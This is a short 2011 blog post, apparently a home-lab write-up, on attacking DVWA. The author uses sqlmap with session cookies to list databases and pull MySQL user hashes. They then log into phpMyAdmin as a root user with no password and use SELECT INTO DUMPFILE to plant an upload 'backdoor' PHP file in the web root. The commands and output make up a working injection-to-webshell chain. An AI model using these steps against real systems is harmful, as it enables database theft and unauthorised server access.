Sunday, July 24, 2011

SQL DUMFILE

web vulner : http://192.168.56.101/dvwa/vulnerabilities/sqli_blind/?id=%27&Submit=Submit#
and i tried to type in sqlmap :
root@archaveliano-laptop:/pentest/database/sqlmap# ./sqlmap.py -u "http://192.168.56.102/dvwa/vulnerabilities/sqli_blind/?id=27&Submit=Submit" --cookie='PHPSESSID=ahh7j1bsrtrs5qtjn8tgpcp4g2; security=low' --dbs

then i get :
web application technology: Apache 2.2.12, PHP 5.3.0
back-end DBMS: MySQL >= 5.0.0
[11:55:00] [INFO] fetching database names
available databases [14]:
[*] abal2
[*] auracms
[*] auracms1
[*] cdcol
[*] dvwa
[*] information_schema
[*] joomla
[*] joomla1
[*] mysql
[*] phpmyadmin
[*] test
[*] upload
[*] wordpress
[*] wordpress2

after type :

root@archaveliano-laptop:/pentest/database/sqlmap# ./sqlmap.py -u "http://192.168.56.101/dvwa/vulnerabilities/sqli_blind/?id=27&Submit=Submit" --cookie="PHPSESSID=lp7qif2ecvd2lod7rp3unddfs1; security=low" --password

and then i get :

web application technology: Apache 2.2.12, PHP 5.3.0
back-end DBMS: MySQL 5
[11:56:26] [INFO] fetching database users password hashes
do you want to use dictionary attack on retrieved password hashes? [Y/n/q] y
[11:56:29] [WARNING] unknown hash Format. Please report by e-mail to sqlmap-users@lists.sourceforge.net.
[11:56:29] [WARNING] no clear password(s) found
database management system users password hashes:
[*] pma [1]:
    password hash: NULL
[*] root [1]:
    password hash: NULL


now, i have 2 user, first pma, and second root, with no password.


after i get password and user mysql, i login into sql, wth url :
192.168.56.102/phpmyadmin
 then i create the database with name : bd
and i create the table for upload

second i create table for form :
after create database and table, results can be seen like this :
then i insert the syntax sql like this :
for dump the file, type :
1. select * into dumpfile '/opt/lampp/htdocs/kotak.html' from kotak;
2. select * into dumpfile '/opt/lampp/htdocs/unggah_file.php' from unggah_file;

 it's finished for upload backdoor.
192.168.56.102/kotak.html

but any script error. 

-=CMIIW=-

1 comment:

  1. correct your script on processing upload... see on google how to create upload file with php...

    ReplyDelete